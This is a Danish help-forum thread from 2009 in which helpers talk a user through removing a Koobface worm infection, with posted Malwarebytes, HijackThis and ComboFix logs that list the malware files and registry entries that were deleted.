Hjælp til at rede virus infektet computer

Hent og installér CCleaner http://www.ccleaner.com/ + http://www.spywarefri.dk/manualer/ccleaner-manual.htm
Under installationen får du tilbudt [Yahoo Toolbar]. Den bør du sige nej til.
Lad programmer foretage en oprydning.

  http://vistaguide.dk/?Artikler/CCleaner-GuideTilOptimeringAfVista/763

----------------

Hent "Malwarebytes' Anti-Malware" her: http://www.malwarebytes.org/mbam.php
Installer og start programmet, opdater, lav "Hurtig skan" under fanebladet "skanner".
Bagefter klik på "vis resultater", tryk på "Fjern det valgte" og send loggen herind sammen med en ny hijackthis log

NB Når du opdaterer Malwarebytes, så klik på "opdater" til den skriver at der ikke er flere opdateringer.

*SUK* Endnu et [Facebook] offer

C:\windows\ld14.exe
c:\windows\freddy64.exe
C:\windows\pp12.exe

Her kommer de to nye logfiler

Malware:

Malwarebytes' Anti-Malware 1.41
Database version: 2775
Windows 5.1.2600 Service Pack 3

2009-09-20 12:16:57
mbam-log-2009-09-20 (12-16-57).txt

Scan type: Quick Scan
Objects scanned: 84627
Time elapsed: 6 minute(s), 13 second(s)

Memory Processes Infected: 3
Memory Modules Infected: 1
Registry Keys Infected: 9
Registry Values Infected: 5
Registry Data Items Infected: 2
Folders Infected: 2
Files Infected: 25

Memory Processes Infected:
C:\Program Files\SafetyCenter\new.exe (Trojan.SafetyCenter) -> Unloaded process successfully.
C:\Program Files\webserver\webserver.exe (Worm.KoobFace) -> Unloaded process successfully.
C:\WINDOWS\pp12.exe (Worm.KoobFace) -> Unloaded process successfully.

Memory Modules Infected:
c:\program files\ddnsfilter\ddnsfilter.dll (Trojan.DNSChanger) -> Delete on reboot.

Registry Keys Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2414a739-9651-441b-bc10-d773267cc19d} (Trojan.BHO.H) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\CLSID\{2414a739-9651-441b-bc10-d773267cc19d} (Trojan.BHO.H) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ddnsfilter (Trojan.DNSChanger) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\ddnsfilter (Trojan.DNSChanger) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddnsfilter (Trojan.DNSChanger) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\safetycenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\webserver (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\webserver (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\webserver (Worm.KoobFace) -> Quarantined and deleted successfully.

Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\safetycenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysfbtray (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp (Worm.KoobFace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\ddnsfilter (Trojan.DNSChanger) -> Quarantined and deleted successfully.

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Folders Infected:
C:\Program Files\DDnsFilter (Trojan.DNSChanger) -> Delete on reboot.
C:\Program Files\SafetyCenter (Trojan.SafetyCenter) -> Quarantined and deleted successfully.

Files Infected:
C:\Documents and Settings\Yngve Ralph\Local Settings\Temp\~8A.dll (Trojan.BHO.H) -> Quarantined and deleted successfully.
C:\WINDOWS\ld14.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\Documents and Settings\Yngve Ralph\Local Settings\Temp\sys32.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\WINDOWS\pp11.exe (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy62.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\Program Files\DDnsFilter\DDnsFilter.dll (Trojan.DNSChanger) -> Delete on reboot.
C:\Program Files\SafetyCenter\main.ico (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\new.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\protector.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\sound.wav (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\start.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\SafetyCenter\uninstall.exe (Trojan.SafetyCenter) -> Quarantined and deleted successfully.
C:\Program Files\webserver\webserver.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\0535251103110107106.yux (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\010112010146114103.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\010112010146116101.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\0101120101465054.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\0101120101465154.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\0101120101465254.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\0101120101465354.xe (KoobFace.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy63.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy64.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\freddy65.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\pp12.exe (Worm.KoobFace) -> Quarantined and deleted successfully.
C:\WINDOWS\ex23567.dat (KoobFace.Trace) -> Quarantined and deleted successfully.

<hijackthis

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:31:19, on 2009-09-20
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Samsung\Samsung EDS\EDSAgent.exe
C:\Program Files\s3graphics\chrome3\Chrome3.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Samsung\Samsung Update Plus\SUPBackGround.exe
C:\Program Files\Samsung\Samsung Battery Manager\BatteryManager.exe
C:\Program Files\McAfee.com\Agent\mcagent.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Samsung\Easy Display Manager\dmhkcore.exe
C:\Program Files\SAMSUNG\MagicKBD\MagicKBD.exe
C:\Program Files\SAMSUNG\MagicKBD\PerformanceManager.exe
C:\Program Files\OpenOffice.org 3\program\soffice.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\OpenOffice.org 3\program\soffice.bin
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Documents and Settings\All Users\Application Data\DatacardService\DCSHost.exe
C:\Documents and Settings\All Users\Application Data\DatacardService\DCSMgr.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\PROGRA~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
C:\Program Files\s3graphics\chrome3\s3funkey.svc
C:\Program Files\s3graphics\chrome3\s3loadsv.svc
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\s3graphics\chrome3\s3funkey.svc
C:\Program Files\Internet Explorer\iexplore.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: McAfee Phishing Filter - {27B4851A-3207-45A2-B947-BE8AFE6163AB} - c:\PROGRA~1\mcafee\msk\mskapbho.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Program Files\McAfee\VirusScan\scriptsn.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.3.4501.1418\swg.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Google Dictionary Compression sdch - {C84D72FE-E17D-4195-BB24-76C02E2E7C4E} - C:\Program Files\Google\Google Toolbar\Component\fastsearch_B7C5AC242193BB3E.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [EDS] C:\Program Files\Samsung\Samsung EDS\EDSAgent.exe
O4 - HKLM\..\Run: [VTTimer] ;;;VTTimer.exe
O4 - HKLM\..\Run: [Chrome3] C:\Program Files\s3graphics\chrome3\Chrome3.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [SUPBackGround] C:\Program Files\Samsung\Samsung Update Plus\SUPBackGround.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [BatteryManager] C:\Program Files\Samsung\Samsung Battery Manager\BatteryManager.exe
O4 - HKLM\..\Run: [DMHotKey] C:\Program Files\Samsung\Easy Display Manager\DMLoader.exe
O4 - HKLM\..\Run: [MagicKeyboard] C:\Program Files\SAMSUNG\MagicKBD\PreMKBD.exe
O4 - HKLM\..\Run: [mcagent_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
O4 - HKLM\..\Run: [UCam_Menu] "C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files\CyberLink\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\2.0"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: OpenOffice.org 3.1.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe
O4 - Global Startup: Bluetooth.lnk = ?
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: Send To Bluetooth - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {8100D56A-5661-482C-BEE8-AFECE305D968} (Facebook Photo Uploader 5 Control) - http://upload.facebook.com/controls/2009.07.28_v5.5.8.1/FacebookPhotoUploader55.cab
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour-tjänst (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: DCSHost.exe - Unknown owner - C:\Documents and Settings\All Users\Application Data\DatacardService\DCSHost.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Anti-Spam Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: S3Funkey - Unknown owner - C:\Program.exe (file missing)
O23 - Service: S3LoadSv - Unknown owner - C:\Program.exe (file missing)
O23 - Service: Marvell Yukon Service (yksvc) - Unknown owner - RUNDLL32.EXE (file missing)

--
End of file - 9890 bytes

Jeg skrev om Malwarebytes:
Installer og start programmet, opdater, lav "Hurtig skan" under fanebladet "skanner".
Bagefter klik på "vis resultater", tryk på "Fjern det valgte" og send loggen herind sammen med en ny hijackthis log

NB Når du opdaterer Malwarebytes, så klik på "opdater" til den skriver at der ikke er flere opdateringer.

Jeg har Database version: 2823

den bedste rensning er i første omgang at køre det udefra.
Dvs flyt hd over i en ekstern boks (evt bare en http://sandberg.dk/product.aspx?id=133-43 som er genial at have liggende)
og tilslut så hd til en maskine, der er fuldt opdateret med viruskontrol og ad-aware.
Scan disken, og det meste gums er væk.

forkert logfil...her kommer den rigtige

Malwarebytes' Anti-Malware 1.41
Database version: 2823
Windows 5.1.2600 Service Pack 3

2009-09-20 12:28:22
mbam-log-2009-09-20 (12-28-22).txt

Scan type: Quick Scan
Objects scanned: 85309
Time elapsed: 6 minute(s), 22 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 7
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 11

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CLASSES_ROOT\CLSID\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{2414a739-9651-441b-bc10-d773267cc19d} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\NetworkNeighborhood\NameSpace\{5172ec55-e786-48a9-8fd9-c27c6a99f249} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe (Rogue.Installer) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\drivers\Filter.sys (Rootkit.DNCBlocker) -> Quarantined and deleted successfully.
C:\Documents and Settings\Yngve Ralph\Local Settings\Temp\install.exe (Rogue.Installer) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252782631 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252791927 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252831567 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252922204 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1252927143 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1253045842 (Worm.Koobface) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1253307189 (Trojan.Dropper) -> Quarantined and deleted successfully.
C:\WINDOWS\vkl_1253439510 (Trojan.Dropper) -> Quarantined and deleted successfully.
C:\Documents and Settings\Yngve Ralph\Local Settings\Temp\zazodin_1253440499.exe (Worm.Koobface) -> Quarantined and deleted successfully.

<claes57>: Ref #5 - det er noget 'vrøvl' - på den måde får du ikke fat i Regsteringsbasen på den 'inficerede' HD. Men kun løse mapper/filer ...

Hent og gem Combofix på dit skrivebord:

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

eller herfra

http://subs.geekstogo.com/ComboFix.exe

Kør så combofix.exe og følg anvisningerne.
Vigtigt--> Deaktiver dit antivirusprogram da det kan forstyrrer combofix
Du bør ikke klikke på vinduet imens værktøjet kører, idet det kan få din computer til at fryse.
Når combofix er færdig, og efter det (muligvis) har genstartet, skulle der gerne åbnes en logfil: combofix.txt
Indholdet af denne fil må du gerne lægge herind.

Den kan findes her:  C:\Combofix.txt

ComboFix 09-09-18.02 - Yngve Ralph 2009-09-20 13:54.1.1 - NTFSx86
Microsoft Windows XP Home Edition  5.1.2600.3.1252.1.1033.18.894.470 [GMT 2:00]
Running from: c:\documents and settings\Yngve Ralph\Desktop\ComboFix.exe
AV: McAfee VirusScan *On-access scanning disabled* (Outdated) {84B5EE75-6421-4CDE-A33A-DD43BA9FAD83}
FW: McAfee Personal Firewall *enabled* {94894B63-8C7F-4050-BDA4-813CA00DA3E8}
.

(((((((((((((((((((((((((((((((((((((((  Other Deletions  )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\documents and settings\Yngve Ralph\d4fderx3_3424.exe
c:\recycler\S-1-5-21-220523388-1645522239-1417001333-1003
c:\windows\msetup
c:\windows\msetup\MSetup.exe
c:\windows\Tasks\At1.job
c:\windows\Tasks\At10.job
c:\windows\Tasks\At11.job
c:\windows\Tasks\At12.job
c:\windows\Tasks\At13.job
c:\windows\Tasks\At14.job
c:\windows\Tasks\At15.job
c:\windows\Tasks\At16.job
c:\windows\Tasks\At17.job
c:\windows\Tasks\At18.job
c:\windows\Tasks\At19.job
c:\windows\Tasks\At2.job
c:\windows\Tasks\At20.job
c:\windows\Tasks\At21.job
c:\windows\Tasks\At22.job
c:\windows\Tasks\At23.job
c:\windows\Tasks\At24.job
c:\windows\Tasks\At3.job
c:\windows\Tasks\At4.job
c:\windows\Tasks\At5.job
c:\windows\Tasks\At6.job
c:\windows\Tasks\At7.job
c:\windows\Tasks\At8.job
c:\windows\Tasks\At9.job

.
(((((((((((((((((((((((((((((((((((((((  Drivers/Services  )))))))))))))))))))))))))))))))))))))))))))))))))
.

-------\Legacy_DDNSFILTER
-------\Service_SfX


(((((((((((((((((((((((((  Files Created from 2009-08-20 to 2009-09-20  )))))))))))))))))))))))))))))))
.

2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Malwarebytes
2009-09-20 10:07 . 2009-09-10 12:54    38224    ----a-w-    c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\documents and settings\All Users\Application Data\Malwarebytes
2009-09-20 10:07 . 2009-09-10 12:53    19160    ----a-w-    c:\windows\system32\drivers\mbam.sys
2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\program files\Malwarebytes' Anti-Malware
2009-09-20 09:45 . 2009-09-20 09:45    --------    d-----w-    c:\program files\CCleaner
2009-09-20 08:44 . 2009-09-20 08:44    --------    d-----w-    c:\program files\Trend Micro
2009-09-18 21:27 . 2009-09-18 21:27    17564    ---ha-w-    c:\windows\system32\mlfcache.dat
2009-09-18 21:19 . 2009-09-18 21:20    --------    d-----w-    c:\program files\Safari
2009-09-18 21:12 . 2009-09-18 21:12    --------    d-----w-    c:\program files\iPod
2009-09-18 21:12 . 2009-09-18 21:21    --------    d-----w-    c:\program files\iTunes
2009-09-18 21:12 . 2009-09-18 21:14    --------    d-----w-    c:\documents and settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
2009-09-18 21:08 . 2009-09-18 21:08    2198    ----a-w-    C:\k48N.bat
2009-09-18 21:08 . 2009-09-18 21:09    --------    d-----w-    c:\program files\QuickTime
2009-09-18 20:53 . 2009-09-18 20:53    1    ---h--w-    c:\windows\bk23567.dat
2009-09-13 08:45 . 2009-09-20 10:16    --------    d-----w-    c:\program files\webserver
2009-09-07 14:00 . 2009-09-07 14:00    1    ---h--w-    c:\windows\e323567.dat
2009-08-26 19:48 . 2009-08-26 19:53    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Spotify
2009-08-26 19:48 . 2009-08-26 19:49    --------    d-----w-    c:\documents and settings\Yngve Ralph\Local Settings\Application Data\Spotify
2009-08-26 19:48 . 2009-08-26 19:48    --------    d-----w-    c:\program files\Spotify

.
((((((((((((((((((((((((((((((((((((((((  Find3M Report  ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-20 07:55 . 2009-07-09 21:03    --------    d-----w-    c:\documents and settings\LocalService\Application Data\SACore
2009-09-18 21:16 . 2009-08-12 16:24    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Apple Computer
2009-09-18 21:12 . 2009-08-12 16:19    --------    d-----w-    c:\program files\Common Files\Apple
2009-08-28 17:42 . 2009-08-12 16:19    40448    ----a-w-    c:\windows\system32\drivers\usbaapl.sys
2009-08-28 17:42 . 2009-08-12 16:19    2065696    ----a-w-    c:\windows\system32\usbaaplrc.dll
2009-08-12 16:27 . 2009-08-12 16:27    17536    ----a-w-    c:\documents and settings\Yngve Ralph\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-08-12 16:23 . 2009-08-12 16:22    --------    d-----w-    c:\documents and settings\All Users\Application Data\{8CD7F5AF-ECFA-4793-BF40-D8F42DBFF906}
2009-08-12 16:22 . 2009-08-12 16:20    --------    d-----w-    c:\documents and settings\All Users\Application Data\Apple Computer
2009-08-12 16:22 . 2009-08-12 16:22    --------    d-----w-    c:\program files\Bonjour
2009-08-12 16:20 . 2009-08-12 16:20    --------    d-----w-    c:\program files\Apple Software Update
2009-08-12 16:19 . 2009-08-12 16:19    --------    d-----w-    c:\documents and settings\All Users\Application Data\Apple
2009-08-11 15:06 . 2009-03-27 20:22    --------    d-----w-    c:\program files\McAfee
2009-08-05 10:09 . 2009-08-05 10:06    --------    d-----w-    c:\program files\Comviq Surf Connect
2009-08-05 10:09 . 2009-08-05 10:06    --------    d-----w-    c:\documents and settings\All Users\Application Data\DatacardService
2009-08-05 09:01 . 2009-03-27 18:48    204800    ----a-w-    c:\windows\system32\mswebdvd.dll
2009-07-17 19:01 . 2009-03-27 18:48    58880    ----a-w-    c:\windows\system32\atl.dll
2009-07-13 21:43 . 2009-03-27 18:48    286208    ----a-w-    c:\windows\system32\wmpdxm.dll
2009-07-09 03:03 . 2009-07-09 03:04    410984    ----a-w-    c:\windows\system32\deploytk.dll
2009-07-03 17:09 . 2009-03-27 18:48    915456    ----a-w-    c:\windows\system32\wininet.dll
.

------- Sigcheck -------

• 2008-06-20 . AD978A1B783B5719720CFF204B666C8E . 361600 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\tcpip.sys
  

• 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\tcpip.sys
  

• 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\drivers\tcpip.sys
  

